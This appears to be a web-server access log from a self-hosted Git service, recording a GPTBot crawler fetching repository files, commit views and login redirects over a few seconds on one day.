https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14253] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 1424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:16:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10049] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" +[17/Feb/2026:16:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10333] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 20593] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:16:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14463] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 28506] [Gzip 9.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 25121] [Gzip 11.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 409948] [Gzip 15.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16672] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 11079] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10056] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates" +[17/Feb/2026:16:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 97375] [Gzip 18.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 14802] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 48296] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fflags.make" [Client 74.7.227.38] [Length 25183] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fTargetDirectories.txt" [Client 74.7.227.38] [Length 23188] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 19840] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 1432] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 10063] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:16:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fCMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 36306] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fTargetDirectories.txt" [Client 74.7.227.38] [Length 24969] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:46:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fprogress.marks" [Client 74.7.227.38] [Length 22643] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fCMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 36832] [Gzip 7.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15588] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14246] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14859] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" +[17/Feb/2026:16:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13971] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/About.tsx" +[17/Feb/2026:16:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 